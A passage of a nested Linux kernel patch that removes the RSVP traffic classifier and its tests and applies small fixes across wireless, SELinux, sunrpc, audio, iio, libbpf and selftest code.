+-	     s = rtnl_dereference(s->next)) {
+-		for (ins = &s->ht[h2], pins = rtnl_dereference(*ins); ;
+-		     ins = &pins->next, pins = rtnl_dereference(*ins)) {
+-			if (pins->handle == h) {
+-				RCU_INIT_POINTER(n->next, pins->next);
+-				rcu_assign_pointer(*ins, n);
+-				return;
+-			}
+-		}
+-	}
+-
+-	/* Something went wrong if we are trying to replace a non-existent
+-	 * node. Mind as well halt instead of silently failing.
+-	 */
+-	BUG_ON(1);
+-}
+-
+-static void *rsvp_get(struct tcf_proto *tp, u32 handle)
+-{
+-	struct rsvp_head *head = rtnl_dereference(tp->root);
+-	struct rsvp_session *s;
+-	struct rsvp_filter *f;
+-	unsigned int h1 = handle & 0xFF;
+-	unsigned int h2 = (handle >> 8) & 0xFF;
+-
+-	if (h2 > 16)
+-		return NULL;
+-
+-	for (s = rtnl_dereference(head->ht[h1]); s;
+-	     s = rtnl_dereference(s->next)) {
+-		for (f = rtnl_dereference(s->ht[h2]); f;
+-		     f = rtnl_dereference(f->next)) {
+-			if (f->handle == handle)
+-				return f;
+-		}
+-	}
+-	return NULL;
+-}
+-
+-static int rsvp_init(struct tcf_proto *tp)
+-{
+-	struct rsvp_head *data;
+-
+-	data = kzalloc(sizeof(struct rsvp_head), GFP_KERNEL);
+-	if (data) {
+-		rcu_assign_pointer(tp->root, data);
+-		return 0;
+-	}
+-	return -ENOBUFS;
+-}
+-
+-static void __rsvp_delete_filter(struct rsvp_filter *f)
+-{
+-	tcf_exts_destroy(&f->exts);
+-	tcf_exts_put_net(&f->exts);
+-	kfree(f);
+-}
+-
+-static void rsvp_delete_filter_work(struct work_struct *work)
+-{
+-	struct rsvp_filter *f = container_of(to_rcu_work(work),
+-					     struct rsvp_filter,
+-					     rwork);
+-	rtnl_lock();
+-	__rsvp_delete_filter(f);
+-	rtnl_unlock();
+-}
+-
+-static void rsvp_delete_filter(struct tcf_proto *tp, struct rsvp_filter *f)
+-{
+-	tcf_unbind_filter(tp, &f->res);
+-	/* all classifiers are required to call tcf_exts_destroy() after rcu
+-	 * grace period, since converted-to-rcu actions are relying on that
+-	 * in cleanup() callback
+-	 */
+-	if (tcf_exts_get_net(&f->exts))
+-		tcf_queue_work(&f->rwork, rsvp_delete_filter_work);
+-	else
+-		__rsvp_delete_filter(f);
+-}
+-
+-static void rsvp_destroy(struct tcf_proto *tp, bool rtnl_held,
+-			 struct netlink_ext_ack *extack)
+-{
+-	struct rsvp_head *data = rtnl_dereference(tp->root);
+-	int h1, h2;
+-
+-	if (data == NULL)
+-		return;
+-
+-	for (h1 = 0; h1 < 256; h1++) {
+-		struct rsvp_session *s;
+-
+-		while ((s = rtnl_dereference(data->ht[h1])) != NULL) {
+-			RCU_INIT_POINTER(data->ht[h1], s->next);
+-
+-			for (h2 = 0; h2 <= 16; h2++) {
+-				struct rsvp_filter *f;
+-
+-				while ((f = rtnl_dereference(s->ht[h2])) != NULL) {
+-					rcu_assign_pointer(s->ht[h2], f->next);
+-					rsvp_delete_filter(tp, f);
+-				}
+-			}
+-			kfree_rcu(s, rcu);
+-		}
+-	}
+-	kfree_rcu(data, rcu);
+-}
+-
+-static int rsvp_delete(struct tcf_proto *tp, void *arg, bool *last,
+-		       bool rtnl_held, struct netlink_ext_ack *extack)
+-{
+-	struct rsvp_head *head = rtnl_dereference(tp->root);
+-	struct rsvp_filter *nfp, *f = arg;
+-	struct rsvp_filter __rcu **fp;
+-	unsigned int h = f->handle;
+-	struct rsvp_session __rcu **sp;
+-	struct rsvp_session *nsp, *s = f->sess;
+-	int i, h1;
+-
+-	fp = &s->ht[(h >> 8) & 0xFF];
+-	for (nfp = rtnl_dereference(*fp); nfp;
+-	     fp = &nfp->next, nfp = rtnl_dereference(*fp)) {
+-		if (nfp == f) {
+-			RCU_INIT_POINTER(*fp, f->next);
+-			rsvp_delete_filter(tp, f);
+-
+-			/* Strip tree */
+-
+-			for (i = 0; i <= 16; i++)
+-				if (s->ht[i])
+-					goto out;
+-
+-			/* OK, session has no flows */
+-			sp = &head->ht[h & 0xFF];
+-			for (nsp = rtnl_dereference(*sp); nsp;
+-			     sp = &nsp->next, nsp = rtnl_dereference(*sp)) {
+-				if (nsp == s) {
+-					RCU_INIT_POINTER(*sp, s->next);
+-					kfree_rcu(s, rcu);
+-					goto out;
+-				}
+-			}
+-
+-			break;
+-		}
+-	}
+-
+-out:
+-	*last = true;
+-	for (h1 = 0; h1 < 256; h1++) {
+-		if (rcu_access_pointer(head->ht[h1])) {
+-			*last = false;
+-			break;
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+-static unsigned int gen_handle(struct tcf_proto *tp, unsigned salt)
+-{
+-	struct rsvp_head *data = rtnl_dereference(tp->root);
+-	int i = 0xFFFF;
+-
+-	while (i-- > 0) {
+-		u32 h;
+-
+-		if ((data->hgenerator += 0x10000) == 0)
+-			data->hgenerator = 0x10000;
+-		h = data->hgenerator|salt;
+-		if (!rsvp_get(tp, h))
+-			return h;
+-	}
+-	return 0;
+-}
+-
+-static int tunnel_bts(struct rsvp_head *data)
+-{
+-	int n = data->tgenerator >> 5;
+-	u32 b = 1 << (data->tgenerator & 0x1F);
+-
+-	if (data->tmap[n] & b)
+-		return 0;
+-	data->tmap[n] |= b;
+-	return 1;
+-}
+-
+-static void tunnel_recycle(struct rsvp_head *data)
+-{
+-	struct rsvp_session __rcu **sht = data->ht;
+-	u32 tmap[256/32];
+-	int h1, h2;
+-
+-	memset(tmap, 0, sizeof(tmap));
+-
+-	for (h1 = 0; h1 < 256; h1++) {
+-		struct rsvp_session *s;
+-		for (s = rtnl_dereference(sht[h1]); s;
+-		     s = rtnl_dereference(s->next)) {
+-			for (h2 = 0; h2 <= 16; h2++) {
+-				struct rsvp_filter *f;
+-
+-				for (f = rtnl_dereference(s->ht[h2]); f;
+-				     f = rtnl_dereference(f->next)) {
+-					if (f->tunnelhdr == 0)
+-						continue;
+-					data->tgenerator = f->res.classid;
+-					tunnel_bts(data);
+-				}
+-			}
+-		}
+-	}
+-
+-	memcpy(data->tmap, tmap, sizeof(tmap));
+-}
+-
+-static u32 gen_tunnel(struct rsvp_head *data)
+-{
+-	int i, k;
+-
+-	for (k = 0; k < 2; k++) {
+-		for (i = 255; i > 0; i--) {
+-			if (++data->tgenerator == 0)
+-				data->tgenerator = 1;
+-			if (tunnel_bts(data))
+-				return data->tgenerator;
+-		}
+-		tunnel_recycle(data);
+-	}
+-	return 0;
+-}
+-
+-static const struct nla_policy rsvp_policy[TCA_RSVP_MAX + 1] = {
+-	[TCA_RSVP_CLASSID]	= { .type = NLA_U32 },
+-	[TCA_RSVP_DST]		= { .len = RSVP_DST_LEN * sizeof(u32) },
+-	[TCA_RSVP_SRC]		= { .len = RSVP_DST_LEN * sizeof(u32) },
+-	[TCA_RSVP_PINFO]	= { .len = sizeof(struct tc_rsvp_pinfo) },
+-};
+-
+-static int rsvp_change(struct net *net, struct sk_buff *in_skb,
+-		       struct tcf_proto *tp, unsigned long base,
+-		       u32 handle, struct nlattr **tca,
+-		       void **arg, u32 flags,
+-		       struct netlink_ext_ack *extack)
+-{
+-	struct rsvp_head *data = rtnl_dereference(tp->root);
+-	struct rsvp_filter *f, *nfp;
+-	struct rsvp_filter __rcu **fp;
+-	struct rsvp_session *nsp, *s;
+-	struct rsvp_session __rcu **sp;
+-	struct tc_rsvp_pinfo *pinfo = NULL;
+-	struct nlattr *opt = tca[TCA_OPTIONS];
+-	struct nlattr *tb[TCA_RSVP_MAX + 1];
+-	struct tcf_exts e;
+-	unsigned int h1, h2;
+-	__be32 *dst;
+-	int err;
+-
+-	if (opt == NULL)
+-		return handle ? -EINVAL : 0;
+-
+-	err = nla_parse_nested_deprecated(tb, TCA_RSVP_MAX, opt, rsvp_policy,
+-					  NULL);
+-	if (err < 0)
+-		return err;
+-
+-	err = tcf_exts_init(&e, net, TCA_RSVP_ACT, TCA_RSVP_POLICE);
+-	if (err < 0)
+-		return err;
+-	err = tcf_exts_validate(net, tp, tb, tca[TCA_RATE], &e, flags,
+-				extack);
+-	if (err < 0)
+-		goto errout2;
+-
+-	f = *arg;
+-	if (f) {
+-		/* Node exists: adjust only classid */
+-		struct rsvp_filter *n;
+-
+-		if (f->handle != handle && handle)
+-			goto errout2;
+-
+-		n = kmemdup(f, sizeof(*f), GFP_KERNEL);
+-		if (!n) {
+-			err = -ENOMEM;
+-			goto errout2;
+-		}
+-
+-		err = tcf_exts_init(&n->exts, net, TCA_RSVP_ACT,
+-				    TCA_RSVP_POLICE);
+-		if (err < 0) {
+-			kfree(n);
+-			goto errout2;
+-		}
+-
+-		if (tb[TCA_RSVP_CLASSID]) {
+-			n->res.classid = nla_get_u32(tb[TCA_RSVP_CLASSID]);
+-			tcf_bind_filter(tp, &n->res, base);
+-		}
+-
+-		tcf_exts_change(&n->exts, &e);
+-		rsvp_replace(tp, n, handle);
+-		return 0;
+-	}
+-
+-	/* Now more serious part... */
+-	err = -EINVAL;
+-	if (handle)
+-		goto errout2;
+-	if (tb[TCA_RSVP_DST] == NULL)
+-		goto errout2;
+-
+-	err = -ENOBUFS;
+-	f = kzalloc(sizeof(struct rsvp_filter), GFP_KERNEL);
+-	if (f == NULL)
+-		goto errout2;
+-
+-	err = tcf_exts_init(&f->exts, net, TCA_RSVP_ACT, TCA_RSVP_POLICE);
+-	if (err < 0)
+-		goto errout;
+-	h2 = 16;
+-	if (tb[TCA_RSVP_SRC]) {
+-		memcpy(f->src, nla_data(tb[TCA_RSVP_SRC]), sizeof(f->src));
+-		h2 = hash_src(f->src);
+-	}
+-	if (tb[TCA_RSVP_PINFO]) {
+-		pinfo = nla_data(tb[TCA_RSVP_PINFO]);
+-		f->spi = pinfo->spi;
+-		f->tunnelhdr = pinfo->tunnelhdr;
+-	}
+-	if (tb[TCA_RSVP_CLASSID])
+-		f->res.classid = nla_get_u32(tb[TCA_RSVP_CLASSID]);
+-
+-	dst = nla_data(tb[TCA_RSVP_DST]);
+-	h1 = hash_dst(dst, pinfo ? pinfo->protocol : 0, pinfo ? pinfo->tunnelid : 0);
+-
+-	err = -ENOMEM;
+-	if ((f->handle = gen_handle(tp, h1 | (h2<<8))) == 0)
+-		goto errout;
+-
+-	if (f->tunnelhdr) {
+-		err = -EINVAL;
+-		if (f->res.classid > 255)
+-			goto errout;
+-
+-		err = -ENOMEM;
+-		if (f->res.classid == 0 &&
+-		    (f->res.classid = gen_tunnel(data)) == 0)
+-			goto errout;
+-	}
+-
+-	for (sp = &data->ht[h1];
+-	     (s = rtnl_dereference(*sp)) != NULL;
+-	     sp = &s->next) {
+-		if (dst[RSVP_DST_LEN-1] == s->dst[RSVP_DST_LEN-1] &&
+-		    pinfo && pinfo->protocol == s->protocol &&
+-		    memcmp(&pinfo->dpi, &s->dpi, sizeof(s->dpi)) == 0 &&
+-#if RSVP_DST_LEN == 4
+-		    dst[0] == s->dst[0] &&
+-		    dst[1] == s->dst[1] &&
+-		    dst[2] == s->dst[2] &&
+-#endif
+-		    pinfo->tunnelid == s->tunnelid) {
+-
+-insert:
+-			/* OK, we found appropriate session */
+-
+-			fp = &s->ht[h2];
+-
+-			f->sess = s;
+-			if (f->tunnelhdr == 0)
+-				tcf_bind_filter(tp, &f->res, base);
+-
+-			tcf_exts_change(&f->exts, &e);
+-
+-			fp = &s->ht[h2];
+-			for (nfp = rtnl_dereference(*fp); nfp;
+-			     fp = &nfp->next, nfp = rtnl_dereference(*fp)) {
+-				__u32 mask = nfp->spi.mask & f->spi.mask;
+-
+-				if (mask != f->spi.mask)
+-					break;
+-			}
+-			RCU_INIT_POINTER(f->next, nfp);
+-			rcu_assign_pointer(*fp, f);
+-
+-			*arg = f;
+-			return 0;
+-		}
+-	}
+-
+-	/* No session found. Create new one. */
+-
+-	err = -ENOBUFS;
+-	s = kzalloc(sizeof(struct rsvp_session), GFP_KERNEL);
+-	if (s == NULL)
+-		goto errout;
+-	memcpy(s->dst, dst, sizeof(s->dst));
+-
+-	if (pinfo) {
+-		s->dpi = pinfo->dpi;
+-		s->protocol = pinfo->protocol;
+-		s->tunnelid = pinfo->tunnelid;
+-	}
+-	sp = &data->ht[h1];
+-	for (nsp = rtnl_dereference(*sp); nsp;
+-	     sp = &nsp->next, nsp = rtnl_dereference(*sp)) {
+-		if ((nsp->dpi.mask & s->dpi.mask) != s->dpi.mask)
+-			break;
+-	}
+-	RCU_INIT_POINTER(s->next, nsp);
+-	rcu_assign_pointer(*sp, s);
+-
+-	goto insert;
+-
+-errout:
+-	tcf_exts_destroy(&f->exts);
+-	kfree(f);
+-errout2:
+-	tcf_exts_destroy(&e);
+-	return err;
+-}
+-
+-static void rsvp_walk(struct tcf_proto *tp, struct tcf_walker *arg,
+-		      bool rtnl_held)
+-{
+-	struct rsvp_head *head = rtnl_dereference(tp->root);
+-	unsigned int h, h1;
+-
+-	if (arg->stop)
+-		return;
+-
+-	for (h = 0; h < 256; h++) {
+-		struct rsvp_session *s;
+-
+-		for (s = rtnl_dereference(head->ht[h]); s;
+-		     s = rtnl_dereference(s->next)) {
+-			for (h1 = 0; h1 <= 16; h1++) {
+-				struct rsvp_filter *f;
+-
+-				for (f = rtnl_dereference(s->ht[h1]); f;
+-				     f = rtnl_dereference(f->next)) {
+-					if (!tc_cls_stats_dump(tp, arg, f))
+-						return;
+-				}
+-			}
+-		}
+-	}
+-}
+-
+-static int rsvp_dump(struct net *net, struct tcf_proto *tp, void *fh,
+-		     struct sk_buff *skb, struct tcmsg *t, bool rtnl_held)
+-{
+-	struct rsvp_filter *f = fh;
+-	struct rsvp_session *s;
+-	struct nlattr *nest;
+-	struct tc_rsvp_pinfo pinfo;
+-
+-	if (f == NULL)
+-		return skb->len;
+-	s = f->sess;
+-
+-	t->tcm_handle = f->handle;
+-
+-	nest = nla_nest_start_noflag(skb, TCA_OPTIONS);
+-	if (nest == NULL)
+-		goto nla_put_failure;
+-
+-	if (nla_put(skb, TCA_RSVP_DST, sizeof(s->dst), &s->dst))
+-		goto nla_put_failure;
+-	pinfo.dpi = s->dpi;
+-	pinfo.spi = f->spi;
+-	pinfo.protocol = s->protocol;
+-	pinfo.tunnelid = s->tunnelid;
+-	pinfo.tunnelhdr = f->tunnelhdr;
+-	pinfo.pad = 0;
+-	if (nla_put(skb, TCA_RSVP_PINFO, sizeof(pinfo), &pinfo))
+-		goto nla_put_failure;
+-	if (f->res.classid &&
+-	    nla_put_u32(skb, TCA_RSVP_CLASSID, f->res.classid))
+-		goto nla_put_failure;
+-	if (((f->handle >> 8) & 0xFF) != 16 &&
+-	    nla_put(skb, TCA_RSVP_SRC, sizeof(f->src), f->src))
+-		goto nla_put_failure;
+-
+-	if (tcf_exts_dump(skb, &f->exts) < 0)
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, nest);
+-
+-	if (tcf_exts_dump_stats(skb, &f->exts) < 0)
+-		goto nla_put_failure;
+-	return skb->len;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, nest);
+-	return -1;
+-}
+-
+-static void rsvp_bind_class(void *fh, u32 classid, unsigned long cl, void *q,
+-			    unsigned long base)
+-{
+-	struct rsvp_filter *f = fh;
+-
+-	tc_cls_bind_class(classid, cl, q, &f->res, base);
+-}
+-
+-static struct tcf_proto_ops RSVP_OPS __read_mostly = {
+-	.kind		=	RSVP_ID,
+-	.classify	=	rsvp_classify,
+-	.init		=	rsvp_init,
+-	.destroy	=	rsvp_destroy,
+-	.get		=	rsvp_get,
+-	.change		=	rsvp_change,
+-	.delete		=	rsvp_delete,
+-	.walk		=	rsvp_walk,
+-	.dump		=	rsvp_dump,
+-	.bind_class	=	rsvp_bind_class,
+-	.owner		=	THIS_MODULE,
+-};
+-
+-static int __init init_rsvp(void)
+-{
+-	return register_tcf_proto_ops(&RSVP_OPS);
+-}
+-
+-static void __exit exit_rsvp(void)
+-{
+-	unregister_tcf_proto_ops(&RSVP_OPS);
+-}
+-
+-module_init(init_rsvp)
+-module_exit(exit_rsvp)
+diff --git a/net/sched/cls_rsvp6.c b/net/sched/cls_rsvp6.c
+deleted file mode 100644
+index 64078846000ef..0000000000000
+--- a/net/sched/cls_rsvp6.c
++++ /dev/null
+@@ -1,24 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * net/sched/cls_rsvp6.c	Special RSVP packet classifier for IPv6.
+- *
+- * Authors:	Alexey Kuznetsov, <kuznet@ms2.inr.ac.ru>
+- */
+-
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/kernel.h>
+-#include <linux/string.h>
+-#include <linux/errno.h>
+-#include <linux/ipv6.h>
+-#include <linux/skbuff.h>
+-#include <net/act_api.h>
+-#include <net/pkt_cls.h>
+-#include <net/netlink.h>
+-
+-#define RSVP_DST_LEN	4
+-#define RSVP_ID		"rsvp6"
+-#define RSVP_OPS	cls_rsvp6_ops
+-
+-#include "cls_rsvp.h"
+-MODULE_LICENSE("GPL");
+diff --git a/net/sunrpc/clnt.c b/net/sunrpc/clnt.c
+index d2ee566343083..b0258507b236c 100644
+--- a/net/sunrpc/clnt.c
++++ b/net/sunrpc/clnt.c
+@@ -2710,7 +2710,7 @@ out_unparsable:
+ 
+ out_verifier:
+ 	trace_rpc_bad_verifier(task);
+-	goto out_err;
++	goto out_garbage;
+ 
+ out_msg_denied:
+ 	error = -EACCES;
+diff --git a/net/wireless/mlme.c b/net/wireless/mlme.c
+index 581df7f4c5240..e7fa0608341d8 100644
+--- a/net/wireless/mlme.c
++++ b/net/wireless/mlme.c
+@@ -277,6 +277,11 @@ int cfg80211_mlme_auth(struct cfg80211_registered_device *rdev,
+ 	    ether_addr_equal(req->bss->bssid, wdev->u.client.connected_addr))
+ 		return -EALREADY;
+ 
++	if (ether_addr_equal(req->bss->bssid, dev->dev_addr) ||
++	    (req->link_id >= 0 &&
++	     ether_addr_equal(req->ap_mld_addr, dev->dev_addr)))
++		return -EINVAL;
++
+ 	return rdev_auth(rdev, dev, req);
+ }
+ 
+@@ -331,6 +336,9 @@ int cfg80211_mlme_assoc(struct cfg80211_registered_device *rdev,
+ 			if (req->links[i].bss == req->links[j].bss)
+ 				return -EINVAL;
+ 		}
++
++		if (ether_addr_equal(req->links[i].bss->bssid, dev->dev_addr))
++			return -EINVAL;
+ 	}
+ 
+ 	if (wdev->connected &&
+@@ -338,6 +346,11 @@ int cfg80211_mlme_assoc(struct cfg80211_registered_device *rdev,
+ 	     !ether_addr_equal(wdev->u.client.connected_addr, req->prev_bssid)))
+ 		return -EALREADY;
+ 
++	if ((req->bss && ether_addr_equal(req->bss->bssid, dev->dev_addr)) ||
++	    (req->link_id >= 0 &&
++	     ether_addr_equal(req->ap_mld_addr, dev->dev_addr)))
++		return -EINVAL;
++
+ 	cfg80211_oper_and_ht_capa(&req->ht_capa_mask,
+ 				  rdev->wiphy.ht_capa_mod_mask);
+ 	cfg80211_oper_and_vht_capa(&req->vht_capa_mask,
+diff --git a/net/wireless/ocb.c b/net/wireless/ocb.c
+index 27a1732264f95..29afaf3da54f3 100644
+--- a/net/wireless/ocb.c
++++ b/net/wireless/ocb.c
+@@ -68,6 +68,9 @@ int __cfg80211_leave_ocb(struct cfg80211_registered_device *rdev,
+ 	if (!rdev->ops->leave_ocb)
+ 		return -EOPNOTSUPP;
+ 
++	if (!wdev->u.ocb.chandef.chan)
++		return -ENOTCONN;
++
+ 	err = rdev_leave_ocb(rdev, dev);
+ 	if (!err)
+ 		memset(&wdev->u.ocb.chandef, 0, sizeof(wdev->u.ocb.chandef));
+diff --git a/samples/hw_breakpoint/data_breakpoint.c b/samples/hw_breakpoint/data_breakpoint.c
+index 418c46fe5ffc3..b99322f188e59 100644
+--- a/samples/hw_breakpoint/data_breakpoint.c
++++ b/samples/hw_breakpoint/data_breakpoint.c
+@@ -70,7 +70,9 @@ fail:
+ static void __exit hw_break_module_exit(void)
+ {
+ 	unregister_wide_hw_breakpoint(sample_hbp);
+-	symbol_put(ksym_name);
++#ifdef CONFIG_MODULE_UNLOAD
++	__symbol_put(ksym_name);
++#endif
+ 	printk(KERN_INFO "HW Breakpoint for %s write uninstalled\n", ksym_name);
+ }
+ 
+diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c
+index 26c9e4da4efcf..d88c399b0e86b 100644
+--- a/security/selinux/hooks.c
++++ b/security/selinux/hooks.c
+@@ -2769,14 +2769,20 @@ static int selinux_umount(struct vfsmount *mnt, int flags)
+ static int selinux_fs_context_submount(struct fs_context *fc,
+ 				   struct super_block *reference)
+ {
+-	const struct superblock_security_struct *sbsec;
++	const struct superblock_security_struct *sbsec = selinux_superblock(reference);
+ 	struct selinux_mnt_opts *opts;
+ 
++	/*
++	 * Ensure that fc->security remains NULL when no options are set
++	 * as expected by selinux_set_mnt_opts().
++	 */
++	if (!(sbsec->flags & (FSCONTEXT_MNT|CONTEXT_MNT|DEFCONTEXT_MNT)))
++		return 0;
++
+ 	opts = kzalloc(sizeof(*opts), GFP_KERNEL);
+ 	if (!opts)
+ 		return -ENOMEM;
+ 
+-	sbsec = selinux_superblock(reference);
+ 	if (sbsec->flags & FSCONTEXT_MNT)
+ 		opts->fscontext_sid = sbsec->sid;
+ 	if (sbsec->flags & CONTEXT_MNT)
+diff --git a/sound/hda/intel-dsp-config.c b/sound/hda/intel-dsp-config.c
+index 317bdf6dcbef4..2873420c9aca8 100644
+--- a/sound/hda/intel-dsp-config.c
++++ b/sound/hda/intel-dsp-config.c
+@@ -481,6 +481,14 @@ static const struct config_entry config_table[] = {
+ 	},
+ #endif
+ 
++/* Lunar Lake */
++#if IS_ENABLED(CONFIG_SND_SOC_SOF_LUNARLAKE)
++	/* Lunarlake-P */
++	{
++		.flags = FLAG_SOF | FLAG_SOF_ONLY_IF_DMIC_OR_SOUNDWIRE,
++		.device = PCI_DEVICE_ID_INTEL_HDA_LNL_P,
++	},
++#endif
+ };
+ 
+ static const struct config_entry *snd_intel_dsp_find_config
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index 064b6feb76167..414ac90273810 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -388,7 +388,9 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "Google"),
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Rex"),
+ 		},
+-		.driver_data = (void *)(SOF_SDW_PCH_DMIC),
++		.driver_data = (void *)(SOF_SDW_PCH_DMIC |
++					SOF_BT_OFFLOAD_SSP(1) |
++					SOF_SSP_BT_OFFLOAD_PRESENT),
+ 	},
+ 	/* LunarLake devices */
+ 	{
+diff --git a/sound/soc/sof/topology.c b/sound/soc/sof/topology.c
+index 872e44408298f..e7305ce57ea1f 100644
+--- a/sound/soc/sof/topology.c
++++ b/sound/soc/sof/topology.c
+@@ -1086,16 +1086,17 @@ static void sof_disconnect_dai_widget(struct snd_soc_component *scomp,
+ {
+ 	struct snd_soc_card *card = scomp->card;
+ 	struct snd_soc_pcm_runtime *rtd;
++	const char *sname = w->sname;
+ 	struct snd_soc_dai *cpu_dai;
+ 	int i;
+ 
+-	if (!w->sname)
++	if (!sname)
+ 		return;
+ 
+ 	list_for_each_entry(rtd, &card->rtd_list, list) {
+ 		/* does stream match DAI link ? */
+ 		if (!rtd->dai_link->stream_name ||
+-		    strcmp(w->sname, rtd->dai_link->stream_name))
++		    strcmp(sname, rtd->dai_link->stream_name))
+ 			continue;
+ 
+ 		switch (w->id) {
+diff --git a/tools/iio/iio_generic_buffer.c b/tools/iio/iio_generic_buffer.c
+index f8deae4e26a15..44bbf80f0cfdd 100644
+--- a/tools/iio/iio_generic_buffer.c
++++ b/tools/iio/iio_generic_buffer.c
+@@ -51,9 +51,9 @@ enum autochan {
+  * Has the side effect of filling the channels[i].location values used
+  * in processing the buffer output.
+  **/
+-static int size_from_channelarray(struct iio_channel_info *channels, int num_channels)
++static unsigned int size_from_channelarray(struct iio_channel_info *channels, int num_channels)
+ {
+-	int bytes = 0;
++	unsigned int bytes = 0;
+ 	int i = 0;
+ 
+ 	while (i < num_channels) {
+@@ -348,7 +348,7 @@ int main(int argc, char **argv)
+ 	ssize_t read_size;
+ 	int dev_num = -1, trig_num = -1;
+ 	char *buffer_access = NULL;
+-	int scan_size;
++	unsigned int scan_size;
+ 	int noevents = 0;
+ 	int notrigger = 0;
+ 	char *dummy;
+@@ -674,7 +674,16 @@ int main(int argc, char **argv)
+ 	}
+ 
+ 	scan_size = size_from_channelarray(channels, num_channels);
+-	data = malloc(scan_size * buf_len);
++
++	size_t total_buf_len = scan_size * buf_len;
++
++	if (scan_size > 0 && total_buf_len / scan_size != buf_len) {
++		ret = -EFAULT;
++		perror("Integer overflow happened when calculate scan_size * buf_len");
++		goto error;
++	}
++
++	data = malloc(total_buf_len);
+ 	if (!data) {
+ 		ret = -ENOMEM;
+ 		goto error;
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index eeb2693128d8a..10f15a3e3a95e 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -8173,6 +8173,7 @@ void bpf_object__close(struct bpf_object *obj)
+ 	bpf_object__elf_finish(obj);
+ 	bpf_object_unload(obj);
+ 	btf__free(obj->btf);
++	btf__free(obj->btf_vmlinux);
+ 	btf_ext__free(obj->btf_ext);
+ 
+ 	for (i = 0; i < obj->nr_maps; i++)
+diff --git a/tools/testing/selftests/ftrace/ftracetest b/tools/testing/selftests/ftrace/ftracetest
+index c3311c8c40890..ef0edb7a71e37 100755
+--- a/tools/testing/selftests/ftrace/ftracetest
++++ b/tools/testing/selftests/ftrace/ftracetest
+@@ -30,6 +30,9 @@ err_ret=1
+ # kselftest skip code is 4
+ err_skip=4
+ 
++# umount required
++UMOUNT_DIR=""
++
+ # cgroup RT scheduling prevents chrt commands from succeeding, which
+ # induces failures in test wakeup tests.  Disable for the duration of
+ # the tests.
+@@ -44,6 +47,9 @@ setup() {
+ 
+ cleanup() {
+   echo $sched_rt_runtime_orig > $sched_rt_runtime
++  if [ -n "${UMOUNT_DIR}" ]; then
++    umount ${UMOUNT_DIR} ||:
++  fi
+ }
+ 
+ errexit() { # message
+@@ -155,11 +161,13 @@ if [ -z "$TRACING_DIR" ]; then
+ 	    mount -t tracefs nodev /sys/kernel/tracing ||
+ 	      errexit "Failed to mount /sys/kernel/tracing"
+ 	    TRACING_DIR="/sys/kernel/tracing"
++	    UMOUNT_DIR=${TRACING_DIR}
+ 	# If debugfs exists, then so does /sys/kernel/debug
+ 	elif [ -d "/sys/kernel/debug" ]; then
+ 	    mount -t debugfs nodev /sys/kernel/debug ||
+ 	      errexit "Failed to mount /sys/kernel/debug"
+ 	    TRACING_DIR="/sys/kernel/debug/tracing"
++	    UMOUNT_DIR=${TRACING_DIR}
+ 	else
+ 	    err_ret=$err_skip
+ 	    errexit "debugfs and tracefs are not configured in this kernel"
+diff --git a/tools/testing/selftests/nolibc/nolibc-test.c b/tools/testing/selftests/nolibc/nolibc-test.c
+index 78bced95ac630..f8e8e8d2a5e18 100644
+--- a/tools/testing/selftests/nolibc/nolibc-test.c
++++ b/tools/testing/selftests/nolibc/nolibc-test.c
+@@ -630,6 +630,35 @@ static struct test test_names[] = {
+ 	{ 0 }
+ };
+ 
++int is_setting_valid(char *test)
++{
++	int idx, len, test_len, valid = 0;
++	char delimiter;
++
++	if (!test)
++		return valid;
++
++	test_len = strlen(test);
++
++	for (idx = 0; test_names[idx].name; idx++) {
++		len = strlen(test_names[idx].name);
++		if (test_len < len)
++			continue;
++
++		if (strncmp(test, test_names[idx].name, len) != 0)
++			continue;
++
++		delimiter = test[len];
++		if (delimiter != ':' && delimiter != ',' && delimiter != '\0')
++			continue;
++
++		valid = 1;
++		break;
++	}
++
++	return valid;
++}
++
+ int main(int argc, char **argv, char **envp)
+ {
+ 	int min = 0;
+@@ -655,10 +684,10 @@ int main(int argc, char **argv, char **envp)
+ 	 *    syscall:5-15[:.*],stdlib:8-10
+ 	 */
+ 	test = argv[1];
+-	if (!test)
++	if (!is_setting_valid(test))
+ 		test = getenv("NOLIBC_TEST");
+ 
+-	if (test) {
++	if (is_setting_valid(test)) {
+ 		char *comma, *colon, *dash, *value;
+ 
+ 		do {
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/filters/rsvp.json b/tools/testing/selftests/tc-testing/tc-tests/filters/rsvp.json
+deleted file mode 100644
+index bdcbaa4c5663d..0000000000000
+--- a/tools/testing/selftests/tc-testing/tc-tests/filters/rsvp.json
++++ /dev/null
+@@ -1,203 +0,0 @@
+-[
+-    {
+-        "id": "2141",
+-        "name": "Add rsvp filter with tcp proto and specific IP address",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
+-        ],
+-        "cmdUnderTest": "$TC filter add dev $DEV1 parent ffff: protocol ip prio 1 rsvp ipproto tcp session 198.168.10.64",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC filter show dev $DEV1 parent ffff:",
+-        "matchPattern": "^filter protocol ip pref [0-9]+ rsvp chain [0-9]+ fh 0x.*session 198.168.10.64 ipproto tcp",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DEV1 ingress"
+-        ]
+-    },
+-    {
+-        "id": "5267",
+-        "name": "Add rsvp filter with udp proto and specific IP address",
+-        "category": [
+-            "filter",
+-            "rsvp"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$TC qdisc add dev $DEV1 ingress"
